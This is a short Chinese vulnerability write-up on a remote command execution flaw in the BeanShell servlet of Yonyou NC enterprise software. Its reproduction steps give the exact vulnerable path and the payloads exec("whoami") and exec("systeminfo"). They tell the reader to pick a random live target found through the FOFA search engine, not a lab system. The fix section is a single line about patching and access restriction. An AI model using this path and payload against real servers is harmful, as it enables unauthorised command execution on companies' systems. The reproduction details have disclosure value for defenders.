漏洞简介
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。
貌似所有版本都存在。
漏洞复现
①FOFA上挑选一位幸运儿,访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面
②Script下输入框输入命令,点击Evaluate可直接执行
执行exec("whoami");
执行exec("systeminfo");
乱码的问题暂时没有找到解决办法,先简单复现一下
漏洞修复
补丁、访问限制